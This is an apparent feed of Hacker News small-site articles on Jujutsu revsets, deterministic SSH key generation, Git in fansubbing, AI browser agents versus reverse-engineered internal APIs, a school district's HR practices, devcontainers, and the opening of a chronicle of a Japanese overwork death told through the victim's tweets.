The ID prefix index is initialised with a revset, which is like an SQL query but for Jujutsu changes. For example, you might write bookmarks() & author([email protected]), which would resolve to all changes in the repository that (a) are labelled directly by a bookmark, and (b) have “[email protected]” as the change author. This revset language is a powerful way to describe different sets of changes, and it’s used extensively in Jujutsu. Commands that take an ID (e.g. jj new -r <id>) generally also take a revset that can describe multiple commits (e.g. jj new -r 'all: bookmarks() & local()' will create a new commit that merges together all your local bookmarks — a surprisingly powerful and useful technique called a megamerge).

    Revsets are also used a lot for configuration. When running jj log, only a subset of changes get shown — typically any local branches, the currently active change, and the trunk change (i.e. main/master/trunk). By default, this subset is defined in the default Jujutsu configuration as the following revset:

    present(@)
      | ancestors(immutable_heads().., 2)
      | present(trunk())
    

Any change that matches this definition will get shown in the log.

    The ID prefix index gets passed a revset like the log one. In fact, by default, it is the log revset. This is usually very convenient: the default log revset shows the changes in the repository that you’re currently working on, so it makes sense to want to quickly reference these changes. This flow of checking the log to see the current change IDs, and then using jj squash or similar commands to manipulate them is so common that the bare jj command is by default aliased to jj log. However, if you want to change it, you can directly set the revsets.short-prefixes configuration setting to the revset query of your choice.

    Conclusion?

To sum up, most of the ID prefixes that you will use in Jujutsu can be short because Jujutsu creates an index out of only the active changes, and consults this index first when looking up ID prefixes. The set of “active changes” is defined using a query language and is configurable under revsets.short-prefixes.

    About halfway through writing this article, I realised that the answer already exists in the documentation: in the section on “Display of commit and change ids”, there is the line “To get shorter prefixes for certain revisions, set revsets.short-prefixes”, followed by an example that prioritises only the current change and its “branch”.

    But I enjoyed my journey to finding out the answer more, and I’ve ended up a lot more familiar with the Jujutsu codebase, and how Jujutsu works as a result.



    ]]>
    https://jonathan-frere.com/posts/jujutsu-shortest-ids/ hacker-news-small-sites-43194600 Thu, 27 Feb 2025 14:19:40 GMT
    <![CDATA[You can not lose your key, if you drop it first]]> thread link) | @imcotton
    February 27, 2025 | https://blog.imcotton.xyz/my-ssh-folder-has-no-private-keys | archive.org

SSH

    🌶 I have a hot take:

    The ~/.ssh folder should NOT contain private keys.

    A private key is generated on the first day of computer setup and remains there permanently. It will have mode 600 if not misconfigured and may also have a passphrase for protection (you do... do you?).

    So, what's the catch?

During its entire lifespan, which can be months or even years, a private key can be compromised in just seconds.

This can occur if someone runs curl -d on your behalf at your terminal during a coffee break, or if the postinstall script of some deeply nested NPM dependency sends the key elsewhere.

    Even if a passphrase is used for protection, it’s crucial to consider the strength of that phrase against offline brute-force attacks.

    ssh-agent to the rescue

If you've enabled AddKeysToAgent and UseKeychain in your ~/.ssh/config file, you can safely remove your private key from the disk after it's automatically added to the ssh-agent (verify with ssh-add -L). This protects against various attacks; however, if you reboot your system, you'll need to set everything up again.

Thus, reproducible key generation comes into play.

Instead of relying on entropy from /dev/random and expecting the end user to manage it securely indefinitely (how?), let's use a well-configured CSPRNG with better algorithms to deterministically regenerate the same private key on demand. Once the private key is added to the ssh-agent, just delete it from the disk. This greatly reduces the attack surface.
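As a minimal sketch of the idea in Python (an illustration, not the actual tool discussed below), you can derive the key bytes from a passphrase and salt with a memory-hard KDF; the input values here are placeholders:

import hashlib
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

def derive_ssh_key(passphrase: bytes, salt: bytes) -> Ed25519PrivateKey:
    # scrypt is memory-hard, slowing down offline brute-force attempts
    seed = hashlib.scrypt(passphrase, salt=salt, n=2**14, r=8, p=1, dklen=32)
    return Ed25519PrivateKey.from_private_bytes(seed)

# The same passphrase + salt always regenerates the same key.
key = derive_ssh_key(b"correct horse battery staple",
                     b"3c5ae80b-99a6-4449-85a0-3610a0700082")
print(key.public_key().public_bytes(
    serialization.Encoding.OpenSSH,
    serialization.PublicFormat.OpenSSH).decode())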

    No private key left means nothing to leak in the first place.

    YOU CAN NOT LOSE YOUR KEY
[the roll-safe meme guy]
    IF YOU DROP IT FIRST

    Moreover, if you do not regularly need to establish an SSH connection, you might consider skipping the entire ssh-agent setup.

    Additionally, backing up your private key using this method is much more reliable, and it remains effective even without specific security concerns.

The final piece of the puzzle is creating a manageable salt/passphrase for the CSPRNG; this can vary based on your threat model. I will provide a few examples for inspiration, but you should choose what works best for you:

UUID

generated from system entropy and placed in ~/.ssh/config as an inconspicuous comment that you can retrieve later on

    3c5ae80b-99a6-4449-85a0-3610a0700082
    

Password

    strong password from password managers and safely stored across multiple devices

    Yi#uHvMQ1/.nH7pKp'TvA-dw-=97%4fWFd$3
    

Git Commit

any completely unrelated git commit hash; it can come from one of your side projects or even some open-source project, as long as you can retrace it from memory

    e8f897f4afef0031fe618a8e94127a0934896aba
    

    --- Linux Kernel tag v6.8

Blockchain

the Merkle tree root hash at any given height of a blockchain

    d249b4edbc844fca9681cfce708a28afe6621ed402e9ca693a36ff563d6d15ec
    

    --- Bitcoin block at height 835,485

Checksum

the tarball checksum of a specific version of any package (npm, crate, etc.)

    sha512-OJwEgrpWm/PCMsLVWXKqvcjme3bHNpOgN7Tb6cQnR5n0TPbQx1/Xrn7rqM+wn17bYeT6MGB5sn1Bh5YiGi70nA==
    

    --- npm esbuild@0.20.1

    or

    8666f87015685834a42aa61a391303d3bee0b1442dd9cf93e3adf4cbaf8de75a
    

    --- crate tokio@1.25.3

Pi digits

a chunk of pi digits

    641260024379684543777339026472512819
    

    --- 36 digits of Pi at 100,000th

Calculation

    two of your favorite numbers multiplied and squared

    232371981027000771278400
    

--- (7355608 × 65535)²

    etc...

    All the above options are for demonstration purposes only. One should carefully evaluate and choose what suits them best.

Deno

The program is released on JSR and designed to be executed by Deno, which is secure by default; it reads from command-line args and emits to stdout, without any file, network, or environment access.

Deno's default security guarantees are important for programs like this. Using it as a library from Node.js or Bun is possible, but not recommended or tested; use at your own risk.

Credit to Paul Miller and his package for the heavy lifting. It also has additional functionality like PGP, OTP, and IPNS, among others; head over to find out more.


    ]]>
    https://blog.imcotton.xyz/my-ssh-folder-has-no-private-keys hacker-news-small-sites-43194541 Thu, 27 Feb 2025 14:13:58 GMT
    <![CDATA[Git for Fansubbing: Probably a Mistake]]> thread link) | @todsacerdoti
    February 27, 2025 | https://redvice.org/2025/git-subbing-was-a-mistake/ | archive.org

    Fansubbing has, since I stopped actively subbing, heavily migrated from an FTP-focused workflow to a Git-based one. I have long harbored suspicions that this was a bad idea on net, but having a recent opportunity to watch a group sub a show convinced me that a longer explanation of my position might be useful.

    History

First, I have to explain the historical workflow. Everyone in a group has access to an FTP server, where the workraw[1] and premux[2] are both uploaded to a folder for the episode as they are encoded. The translator will generally type out the initial script into an Etherpad clone[3], along with all the signs and timestamps. The typesetter(s) will complete the signs in the pad, marking them off as they go, and upload the file containing the signs to the FTP when completed, with a filename like showname_06[ts-ryan].ass, along with all the fonts they used. The timer will take the dialog from the pad and time it in Aegisub, splitting where appropriate, and upload a showname_06[time].ass file along with their chosen dialog fonts, usually copying over the OP and ED files from previous episodes as part of this. Editing can happen either in the pad (my preference) or after timing, in which case there'd also be a showname_06[edit].ass file dumped in the folder. Translation checking is also handled both ways, when applicable. The QC will then merge the typesetting and finalized dialog and upload a showname_06[merged].ass, and they or others will upload showname_06[qc].ass and potentially successive versions with changes in response to the QC pass[4][5]. Finally, someone takes the final version, muxes everything together in mkvtoolnix, makes a torrent, and throws it up on Nyaa. Show released!

    Changes

    Since then, there have been two major changes to the workflow.

    The first major change is migrating to Git for a lot of the process. This was, as best I can tell, done in response to the host of different versioned files that would be dumped on the FTP. Some people felt that version control was a better solution, and Git was chosen for that purpose as it was by this point effectively the standard in software engineering.

    The second is automating the actual release process much more heavily, in an effort to stamp out issues like forgetting to mux fonts, incorrect naming, and merging the wrong scripts. This workflow change seems conceptually positive to me; even if I have gripes with some of the specific tools used for it[6], we were previously at a suboptimal level of release automation. I want to be clear that this is theoretically separate from the migration to Git, and the benefits of automated releases can be accrued independently. The existing tools tie the two together, but I consider them overcomplicated and don’t believe the marriage is intrinsic. There’s nothing stopping people from using a standardized naming scheme on FTP and a more straightforward tool to simplify the merge, muxing, and release processes.[7]

    My core contention is that because the same person made the general tooling improvements and some of the tooling that enabled a Git workflow, people mentally link them and adopt the less useful portion (Git) unnecessarily. I also claim that the existing tools are overly generic and difficult for most people to use.

    Strengths

    I’ll start with what Git’s theoretical strengths: it offers a single latest version of any file going into a release, with a clear history of changes to it, and enables concurrent editing to a file. If you’re using Github, the pull request process also offers a way to review QC changes, creating a middle ground between the QC purely taking notes and the QC applying changes directly. It also creates nice web-based diffs automatically, which makes it generally easier to review others’ work.

    Unfortunately, I’m not convinced these are particularly great benefits. Having a single latest version of a file is useful, but wasn’t a big issue in practice on the FTP, even if showname_ep06[qc][final][v3][no but for real this time].ass looks goofy, and could have been dealt with by standardizing naming (enforced by a release bot). Similarly, the concurrent editing is nice in theory but in practice does not come up very often if you’re separating dialog and TS.

    I’m also not sold that the version history matters much at all for subbing. I’ve almost never seen it referenced due to the fundamentally short-term nature of these releases. In the scenario you’re looking to change something for the Blu-rays, it’s usually not long after the project and the staff can just search in the channel to read the discussion, if one ensued. You do ensure that the version history is never accidentally overwritten, which is much easier to do on accident with an FTP, but if it doesn’t matter much either way I don’t consider the occasional mistakes to be of much consequence.

Finally, the pull request process seems mildly beneficial, but again not all that great. Most changes aren’t actually discussed in context on the site, and instead are discussed in the staff channel on Discord, and even a competent QC will probably leave some changes to the original typesetter, so you’ll end up with the good ol’ process of pinging the typesetter to push changes anyway. This, and similar workflows borne of the diffs being intrinsic to Git, is probably the strongest argument for it, though I personally know a lot of people who don’t like it and don’t take advantage of it at all. It seems great for some groups, particularly ones composed heavily of programmers comfortable with Github, but probably not great for the median project.

    Problems

    Now that I’ve talked about the benefits and why I consider them minimal, what about the downsides?

The biggest one is that Git is really difficult to use. If you think otherwise, you probably don’t understand it very well. Software engineers are overrepresented in fansubbing, so basic familiarity is common among staff, but even then, in practice, every group has someone whose part-time job is unfucking the inevitable messes Git produces. And for people who don’t work in software, which includes many of the translators[8], Git means punching in arcane commands or dealing with an extremely complicated GUI, and occasionally getting into a bad state and begging a team member to help[9].

It also necessitates further mandatory tooling setup to contribute to a project. In practice, everyone still uses an FTP for the premuxes[10], so installing Git locally along with a GUI, making a Github account, and getting this all running is an extra step for every non-programmer to muddle through. You’re also putting your questionably legal fan translations on Github, which has so far been fine but which I personally have reservations about. And unlike when typesetting gained increased tooling requirements, this offers no improvement (hopefully) to the final output. You get theoretical minor efficiency and consistency improvements in exchange for a more complicated toolchain pushed onto the entire group. The tradeoff is quite different.

    It also makes it surprisingly easy to leak personal information if a group wants to make a repo public. There’s an extra manual step of checking to see if anyone used identifying information in their commits, and rewriting the history if so.

Finally, as mentioned earlier, Git adoption seems to have been tied originally to SubKt[11], and more recently also muxtools. Both of these are monsters, so generic that they force every group to have someone comfortable in Kotlin or Python, respectively, to set them up and maintain them for every project. In practice this means that, much like Git itself, every project ends up needing someone whose part-time job is tech support. These tools are difficult to set up and CLI-only, so good luck to anyone who has to interact with them who isn’t a programmer!

    Looking forward

    I think the situation has gotten sufficiently bad that groups have actually ended up in a worse place than the historical FTP-based workflow. I view the current situation as programmers responding to their dislike of manual processes by pushing incredibly complex tools on non-technical users for very marginal benefits (and very likely negative time saved).

    What would a better world look like? A more opinionated tool, with YAML or some equivalent for configuration, running as a bot on a server with an FTP and enforcing a standardized naming scheme, and with less magical mega-merging and more checks to make sure everything necessary is present as part of a release, alongside the more rote aspects like muxing and uploading. It should opt for manual processes over automated ones for anything too complicated, and try hard to be straightforward for a nontechnical user. This means it has to be a single binary on Windows/MacOS, packaged in an installer, and have a GUI for editing the configuration and generating a release. No more “just learn python lol”. There’s a world where we have tooling that’s strictly better than the old workflow, but we aren’t there today.
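
Sketching it out, the per-show config for such a tool might be no more than this. Every key here is invented for illustration; as far as I know, no tool with this exact schema exists:

# hypothetical config for an opinionated release bot
show: showname
naming: "{show}_{ep:02d}[{role}].ass"    # enforced on the FTP
roles: [ts, time, edit, merged, qc]
release:
  require: [merged, qc, fonts, premux]   # refuse to release if anything's missing
  chapters: manual                       # punt on anything too complicated
  upload: nyaa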


    Thanks to Petzku for reading a draft of this post.

    ]]>
    https://redvice.org/2025/git-subbing-was-a-mistake/ hacker-news-small-sites-43194496 Thu, 27 Feb 2025 14:07:27 GMT
    <![CDATA[A New Web is Here: Unified by AI]]> thread link) | @richardzhang
    February 27, 2025 | https://integuru.ai/blogs/newweb/newweb.html | archive.org

    Introduction

OpenAI released Operator last month, its first computer-using agent that controls software like a human. Others have come before, from both bigger companies and startups, like Anthropic’s Computer Use, Skyvern, and Browser Use. While this launch is exciting for consumers, it’s equally intriguing for developers. In particular, developers are wondering: are these agents the best way to control external platforms when official APIs don’t exist?

    In more technical terms, we’re talking about “integrations”, which refers to the process of enabling an application to communicate and interact with another platform. Traditionally, integrations are done via APIs, but now, with Operator and others, agentic browser automation is an additional way to integrate. Here, we will compare the different options and discuss the pros and cons of each.

    Three ways to integrate with web platforms that lack official APIs:

    1. Agentic Browser Automation: using a browser automation agent with step-by-step reasoning.
    2. Hardcoded Browser Automation: hardcoded browser automation script.
    3. Internal API Connection: reverse-engineering the platforms’ internal APIs.

    Here’s a chart comparing the 3 options today:

    Chart comparing present-day integration options

    (1) Agentic Browser Automation

    Agentic Browser Automation, like Operator, is the most flexible approach because an agent can theoretically use any UI designed for a human. When working properly, the agent should perform any actions on any platform even when visiting it for the first time. Agentic Browser Automation’s step-by-step reasoning is great for handling unforeseen platforms and use cases, but it also has drawbacks: reliability and latency.

Reliability issues stem from hallucination. Anthropic’s Computer Use famously took a break in the middle of a task to look at photos of Yellowstone National Park. However, we can be confident that hallucinations will decrease as models improve.

    Latency, the time it takes to accomplish a given task, can increase due to reasoning speeds and infrastructure challenges. Introducing reasoning to every step means the agent needs to think on every page. This causes both increased errors and time delays. While we expect reasoning speeds to improve, browser automation infrastructure is the harder part to speed up irrespective of foundation model improvements. To enable browser automation, developers need to spin up browsers and wait for each page to fully load before triggering actions on the page. The typically long time it takes to spin up browsers is called the “cold start problem”, which is solvable with third-party services. However, the main chunk of the latency comes from page load times, which is much harder to accelerate.

    In practice, many actions are at least 3-4 page clicks away. For instance, to download a bank statement, one needs to select a bank account, go to the “statements” tab, and then select the relevant month. These cumulative steps can cause 30-40 seconds of latency to download just one statement. A typical workflow, like downloading all available statements, can comprise multiple smaller actions, therefore accumulating each action’s time delay.

    (2) Hardcoded Browser Automation

Hardcoded Browser Automation is a more direct approach than the agentic alternative. Instead of dynamically reasoning through each step, developers program fixed scripts to navigate a platform — clicking buttons, filling out forms, and manipulating data based on known UI structures.

    Common tools include Puppeteer, Playwright, and Selenium. The scripts follow a predefined flow: (1) spin up a browser, (2) navigate to specific URLs, (3) locate elements using CSS selectors or XPath, and (4) execute actions. This approach yields lower latency than Agentic Browser Automation due to a lack of AI reasoning at every step.
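
As a rough illustration of that flow (the URL and selectors are invented, and a real script needs error handling at every step), a Playwright sketch in Python might look like:

from playwright.sync_api import sync_playwright

# Hypothetical task: log in and grab a statement from a bank-like site.
with sync_playwright() as p:
    browser = p.chromium.launch(headless=True)      # (1) spin up a browser
    page = browser.new_page()
    page.goto("https://bank.example.com/login")     # (2) navigate to a specific URL
    page.fill("#username", "user")                  # (3) locate elements via CSS selectors
    page.fill("#password", "secret")
    page.click("button[type=submit]")               # (4) execute actions
    page.wait_for_selector("a.statement-link")      # wait for the page to load
    with page.expect_download() as dl:
        page.click("a.statement-link")
    dl.value.save_as("statement.pdf")
    browser.close()

If the site renames #username or restructures the page, the script breaks, which is exactly the fragility described below.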

However, Hardcoded Browser Automation suffers from the same core limitations as Agentic Browser Automation: limited reliability and high latency. Platforms often update their frontend code, changing element structures and class names, or requiring new user interactions (e.g. CAPTCHAs), which causes the scripts to break. Latency remains an issue as well, because these scripts still require spinning up browsers and waiting for pages to load.

    In short, Hardcoded Browser Automation trades flexibility for speed but is still limited by the fundamental problems of browser-based automation.

    (3) Internal API Connection

    Internal API Connection is the most reliable and low-latency approach. It is best for products that need the most performant integrations possible. Every web application has internal APIs — hidden interfaces that let the frontend and the backend communicate and power everything behind the scenes. Instead of relying on the frontend, Internal API Connection sends needed requests straight to the backend, avoiding browser-based automation’s latency and reliability issues.

    Internal APIs change less frequently than frontend elements because they tend to remain stable and support core platform functionalities. These requests are also harder to detect and block because they closely mimic the platform’s network traffic. This means higher integration reliability.

    Since requests are directly sent to the backend, Internal API Connection doesn’t require spinning up browsers or waiting for pages to load. Even actions hidden behind many pages on the UI can trigger in seconds. This approach is the fastest of the three, adding only a few seconds on average to the platform’s native request latency.

    Since internal APIs aren’t publicly documented, developers must reverse-engineer them by figuring out how a platform’s frontend communicates with its backend. This means digging into network requests to uncover hidden endpoints and data structures. Tools like Chrome DevTools, mitmproxy, and Burp Suite help capture and analyze these requests, but even with these tools, the process is still quite complicated. Platforms often encrypt payloads, generate authentication tokens on the fly, or intentionally scramble API traffic to make reverse engineering harder. Understanding these patterns takes patience, technical expertise, and trial and error.
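
Once an endpoint has been mapped out, the integration itself reduces to a plain HTTP call. A minimal sketch in Python, where the endpoint, parameter, and auth header are hypothetical stand-ins for whatever the reverse-engineering uncovers:

import requests

session = requests.Session()
# The token is captured (or re-derived) from the platform's login flow;
# replicating that derivation is usually the hard part.
session.headers.update({
    "Authorization": "Bearer <captured-session-token>",
    "X-Requested-With": "XMLHttpRequest",  # mimic the frontend's own traffic
})

resp = session.get(
    "https://bank.example.com/api/v2/accounts/123/statements",  # hidden endpoint
    params={"month": "2025-01"},
    timeout=10,
)
resp.raise_for_status()
print(resp.json())  # no browser, no page loads: just the data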

    Due to these difficulties, Internal API Connection is the most technically challenging approach. Unlike browser-based automation, it requires highly custom solutions for each platform, which leads to less flexibility and higher setup costs.

    To ease the resource-intensive work of Internal API Connection, Integuru created the first AI agent to automate reverse-engineering internal APIs and generate the entire integration code. Given how difficult reverse engineering can be, automation significantly reduces development costs and helps companies reap the benefits of Internal API Connections without sacrificing development resources.

    A Hybrid Approach: Adding Agentic Browser Automation

Agentic Browser Automation doesn’t need to be a standalone approach; it can also enhance the other two methods’ maintenance processes. Instead of introducing AI reasoning at every step, developers can use it only when needed for maximum efficiency.

For Hardcoded Browser Automation, AI agents like Operator can be deployed when scripts break. Developers can run the agent to complete the desired action and then use its recorded steps to generate an updated script. This hybrid approach reduces maintenance overhead and thereby increases reliability. However, it’s important to note that the fundamental latency issue of browser-based automation still persists.

    For Internal API Connections, Agentic Browser Automation can also help with maintenance. When websites change their internal APIs, a web-browsing agent can redo the desired action, triggering the relevant network requests along the way. At that point, a reverse-engineering agent like Integuru can analyze the newly updated network requests to generate a working integration.

By introducing Agentic Browser Automation only when needed, developers can minimize reasoning latency and errors while maximizing reliability. We can expect most approaches to involve Agentic Browser Automation at some level in the near future.

    Choosing the Right Approach

    So when is the best time to use browser-based automation (including Agentic Browser Automation and Hardcoded Browser Automation) vs Internal API Connection?

    Given its flexibility, browser-based automation is best for cases where there is a high quantity of platforms and/or actions to automate, including scraping. For instance, when a company needs to scrape thousands of websites or streamline a workflow across dozens of platforms, browser-based automation is the easiest and fastest approach. Agentic Browser Automation is also the only way to deal with unforeseen cases as of now. Or, if you’re a small team trying to spin up automation quickly and willing to accept the trade-offs, manually writing hardcoded UI-based scripts can be much faster.

    On the other hand, if you need specific functionalities on specific platforms and integrations are core parts of your product, Internal API Connection should be the top choice. For example, an AI voice agent should reverse-engineer an electronic health record (EHR) system that lacks official APIs if it wants to check, schedule, and cancel patient appointments. In this example, low latency and reliability are especially important because humans are waiting on the line, and reducing errors is important for the product's usefulness. In essence, if you know exactly what you need and you’ll use those actions repeatedly, Internal API Connection is the most effective approach.

    Looking Ahead

    Over time, both browser-based automation and Internal API Connection will improve alongside foundation model improvements. Models will have faster reasoning speeds and become more accurate at browsing the web, resulting in higher reliability and lower latency for browser-based automation. With efforts from companies like Integuru that also benefit from model advancements, Internal API Connection will become more flexible and approachable. In other words, the two categories will see drastic improvements.

    Here’s a chart showing where the future is heading:

    Chart comparing present-day integration options

    Closing

At Integuru, we’re the first company to use AI to improve the Internal API Connection approach. While we focus on this method, we don’t shy away from recommending that teams choose another approach when we sense a better fit elsewhere. Our goal is to make the web interoperable, which enables better products and experiences for all. We’d love to hear your ideas and feedback as we continue shaping the future of integrations. Let’s build a more connected world together.

    ]]>
    https://integuru.ai/blogs/newweb/newweb.html hacker-news-small-sites-43194260 Thu, 27 Feb 2025 13:40:00 GMT
    <![CDATA[The Great HR Escape:Dodging Decisions in Anglophone East]]> thread link) | @raindropsz
    February 27, 2025 | https://raindropsandsunshine.ca/the-great-hr-escape/ | archive.org

    A concerning trend has come to light regarding the treatment of special needs students in the Anglophone East School District. It appears that the HR department is actively circumventing agreements that were made by The Human Rights Commission and Lawyers in favour of these children. This raises serious concerns among parents, advocates, and the community.


    All students deserve the support they need to succeed in their academic journey, especially those with severe autism. It’s disheartening when schools fail to provide the necessary accommodations, making students and families feel lost. When every other avenue has been explored, filing a human rights complaint may be the final step to getting the help that they deserve.

If a student with dyslexia is not provided with additional time to complete reading and English assignments, they may struggle to keep up with their classmates and fall behind in their studies. Some have even been manipulated into taking courses that do not meet their needs, solely for the benefit of others. Similarly, if a student with autism is not given access to a dedicated, trained EA, they may have difficulty managing their behavior and engaging in classroom activities. This can mean a parent spends more time picking up their child from school, which prevents some parents from working.

    Dragging Their Feet

The Human Resource complaint process is supposed to be a mechanism for addressing issues of discrimination, harassment, or other violations against students or staff. However, it seems that in the case of the Anglophone East School District, the HR department in some cases is using this process as a means to block special needs students from accessing the support they are entitled to, by implementing an administrative block to prevent a student from working with their compatible EA.

One way HR circumvents decisions and negatively impacts special needs kids is by delaying the process. When a complaint is filed, there are supposed to be strict timelines for resolution. However, it has been reported that HR drags its feet, causing unnecessary delays and creating additional stress for the families caught in the backlash. This tactic not only prolongs the students’ suffering, in some cases preventing a special needs student from graduating, but also discourages others from coming forward with valid human rights complaints due to concerns about retaliation.

    The Impact on Special Needs Students

    The School District’s HR department’s behavior can have a big impact. Students with special needs already have a tough time in school. When their rights are not respected, it makes things even harder for them. By cutting off their access to vital support like dedicated EAs, these students can’t reach their full potential.

Additionally, the message being sent to these students is one of disregard and disrespect. By dismissing their parents’ concerns and dragging out the resolution process, HR is essentially telling these students that their opinions don’t matter. This can have lasting negative effects on their confidence and mental well-being.

    What Can be Done to Address This Issue?

Action needs to be taken to address this troubling behaviour of the Anglophone East School District’s HR department. Parents, advocates, and concerned community members can come together to demand accountability and transparency. By shining a light on these practices and advocating for change, we can ensure that special needs students are given the respect and support they deserve.


    Decisions made against special needs kids’ best interests are deeply concerning. Steps must be taken to rectify this situation and ensure that all students, regardless of their abilities, are treated with dignity and respect and can be supported with accommodations that meet their needs and not what is convenient for the district. By standing up for the rights of these vulnerable children, we can create a more inclusive and supportive educational environment for everyone.

    Disclosure: This article is accurate and true to the best of the author’s knowledge. Content is for informational or entertainment purposes only and does not substitute for personal counsel or professional advice in business, financial, legal, or technical matters.

    ]]>
    https://raindropsandsunshine.ca/the-great-hr-escape/ hacker-news-small-sites-43194191 Thu, 27 Feb 2025 13:28:55 GMT
    <![CDATA[Devcontainers: I love you, I hate you]]> thread link) | @fbuilesv
    February 27, 2025 | https://www.mitchellrysavy.com/blog/2025/02/26/devcontainers.html | archive.org

    When I joined GitHub in 2021, they were on the cusp of launching GitHub Codespaces. Codespaces is one part cloud IDE, one part VM; the key selling point is that you can go to any Codespaces-enabled repo in your browser, click “New Codespace,” and you’ll be launched into an environment where you can write, test, and commit code, without a lot of setup. This is powered primarily by Visual Studio Code’s devcontainer feature.

    After the public launch, there was a push to get teams using Codespaces internally, and as the New Guy, I started refactoring our codebase to work in a devcontainer (and thus, Codespaces.) I’m not normally someone who jumps on every hype train that passes by, but the value proposition of Codespaces and devcontainers was immediately evident to me. The setup process for GitHub at the time was extremely convoluted and seemed to always require one more CPU fan than my laptop had available.

    Early Infatuation

    Outside of work, Codespaces was not free at the levels I required, so I didn’t really use it. However, devcontainers are just a feature, and I still found them useful. I added one to geneac which was useful when I solicited contributions for Hacktoberfest. One particularly awesome use case for a containerized development environment is the ability to pin to certain versions of an environment, like I did for ProjectBlazt, so I would be able to build it against the toolchain I needed in the future.
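
The pinning itself is just a matter of pointing the config at an exact image tag. A minimal .devcontainer/devcontainer.json along these lines (the image name and post-create command are illustrative):

{
  "name": "pinned-toolchain",
  "image": "ghcr.io/example/projectblazt-env:2023-05",
  "postCreateCommand": "make deps"
}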

    Papercuts

When everything is set up properly and the stars align, it works great. Contributors start up VS Code, get a little message to open the folder in a devcontainer, and within a minute or so they’re ready to code. Unfortunately, this is rarely the case…

    Docker

    Setting up Docker is, in theory, pretty easy. On Windows and Mac, there is Docker Desktop, which is free with some restrictions. On Linux, it should be even easier since it is usually in the distro’s packages, or, if not there, you can install it from the upstream packages directly.

In practice, the best experience I’ve had as a developer by far was using Docker Desktop on a Mac. Docker Desktop creates a Linux virtual machine in order to run Docker, and however that works under the hood on Mac[1] was very reliable and rarely caused issues. On Windows, it uses Hyper-V, which is… fine… but there are quirks you need to learn about here too. For example, did you know that mounting a folder from Windows into a Docker container is dog slow? The “workaround” here is to use the WSL2 integration, clone your repo in your distro there, and then run the devcontainer from WSL2.

    On Linux, where the overhead is much lower (no need for a separate VM!) the situation is unfortunately worse. If your container setup is doing funky stuff with permissions (like BLIS is) then you need to be careful, since changes in the mounted filesystem directly affect the underlying files too. Other than that, things worked as expected in Ubuntu… but then I switched to Fedora, which uses SELinux. If Docker and SELinux were in a relationship, their Facebook status would be “it’s complicated.” I think it’s possible to reconcile them, but rather than spend the time doing that, I now just use an Ubuntu VM, running Docker, from which I can run my devcontainers.

    Features

As devcontainers matured, “Devcontainer Features” were added. These are supposed to be one-liners you can add to your configuration that set up things like SSH, Python, Java, Docker (that’s right: you can run Docker in Docker!), etc. Although I do use them, I am a little confused about the niche they fill. At best, they move a pile of bash from something that you maintain to something that somebody else maintains. At worst, they’re another external dependency that becomes a vector for breakage when you change your base container image to a distro they don’t support.
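
For reference, the one-liners look like this in devcontainer.json (docker-in-docker shown here is one of the officially published features):

{
  "features": {
    "ghcr.io/devcontainers/features/docker-in-docker:2": {}
  }
}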

    Speed

    Pulling Docker images can be pretty slow by itself, but the premise of devcontainers is that you can shove a bunch of logic into a script that runs and sets up the environment. So, in order to get going, you have to:

    1. Pull the base image (probably large if it’s something like Ubuntu)
    2. Run a bunch of scripts to install additional packages and do other setup

Codespaces solves this (kind of) with their prebuild feature, which packages 1 & 2 together as much as possible. Plain devcontainers don’t have that luxury, although what I tend to do is fake it by cramming as much as possible into the Docker container image and pushing it to the container registry. Then, when you start a devcontainer, it pulls the image rather than building a fresh copy[2]. Still not ideal, but faster.

    Hell is Other Peoples’ Computers

    All of this is manageable… extremely annoying at times, but manageable - if you’re comfortable getting your hands dirty. My biggest mistake with devcontainers is trying to use them for projects where people without a lot of experience in this area are regularly contributing. There are so many places where things could go wrong:

    • Docker might not be set up correctly, and it might not be telling you what’s wrong
    • Maybe Docker works, but VS Code repeatedly fails to build or run the image (this happens often to me without a clear explanation)
    • The container starts, but it can’t be accessed by VS Code
    • The devcontainer starts properly, but one of the sidecar containers (eg. the database) died for some reason
    • Wait, how do I access one of the sidecar containers? Instructions unclear, built a toaster
    • Something broke for no clear reason. What layer is it in? If I’m helping someone, how do I tell them what to check?
    • If you have an ARM-based machine (M1+ Mac), I don’t even know what’s going to happen

Debugging issues with the whole stack across a variety of computers, remotely, is leading me away from devcontainers and towards good old-fashioned virtual machines. Vagrant can get me most of the way there for every platform that matters (i.e. I can tell people “just install VirtualBox”), and it seems like there is less to go wrong.

    The Promised Land

    I dream of a day when a one-click development environment is a reality, and this is so close, but it’s not there for complicated projects yet. For simple projects, I likely will continue to use devcontainers, but with extremely conservative options that minimize the dependency on their specific quirks.


    1. x86, not M1/M2+
    2. Building a fresh copy of the image also requires a functional Docker setup, and, well…
    ]]>
    https://www.mitchellrysavy.com/blog/2025/02/26/devcontainers.html hacker-news-small-sites-43194169 Thu, 27 Feb 2025 13:26:26 GMT
    <![CDATA[Matsuri's Grown-Up World – a first-person chronicle of a karoshi death]]> thread link) | @mrcgnc
    February 27, 2025 | https://aethermug.com/posts/matsuri-s-grown-up-world | archive.org

    April 2015: Matsuri Takahashi, fresh out of the most prestigious university in Japan, begins her first job at Dentsu, a major advertising company.

Takahashi on her graduation day in March 2015. Photo by her mother, Yukimi Takahashi.

    These are some of her tweets from the following months (all emphasis mine).

    Tweeted at

    12:41 PM, May 30, 2015 (Saturday)

    Love weekends so much

    Tweeted at

    12:39 AM, September 9 (Wednesday)

    Leaving work now, I'm wrecked

    Tweeted at

    12:41 AM, September 9 (Wednesday)

    A proper junior employee should virtuously hang on until the last train of the day...

    Tweeted at

    8:22 AM, September 26 (Saturday)

    This is too intense, it's getting way too painful...

    Tweeted at

    9:59 AM, October 1 (Thursday)

    While new hires are attending their job offer ceremony with dreams of a bright future, second-year employees are ironically at the clinic on the same floor for health checkups as "people requiring management." New hires, this is what society is like.

    Tweeted at

    9:11 PM, October 2 (Friday)

    It's so hard, I think being a new employee isn't fun at all as I go to work, come home on the last train, sleep without removing my makeup, wake up without even being able to talk to friends, every day. But it was really healing when I went to Ginza with a coworker from my cohort for a small work errand, and we walked and said "I can smell osmanthus flowers, autumn is nice."

    Tweeted at

    6:13 PM, October 3 (Saturday)

    Working is just too painful.

    Tweeted at

    11:35 PM, October 4 (Sunday)

    Dear God, I don't want to go to work.

    Tweeted at

    11:39 PM, October 4 (Sunday)

    I was so full of life during my student days, and now look what's happened to me. "A member of society"...

    Tweeted at

    11:55 PM, October 4 (Sunday)

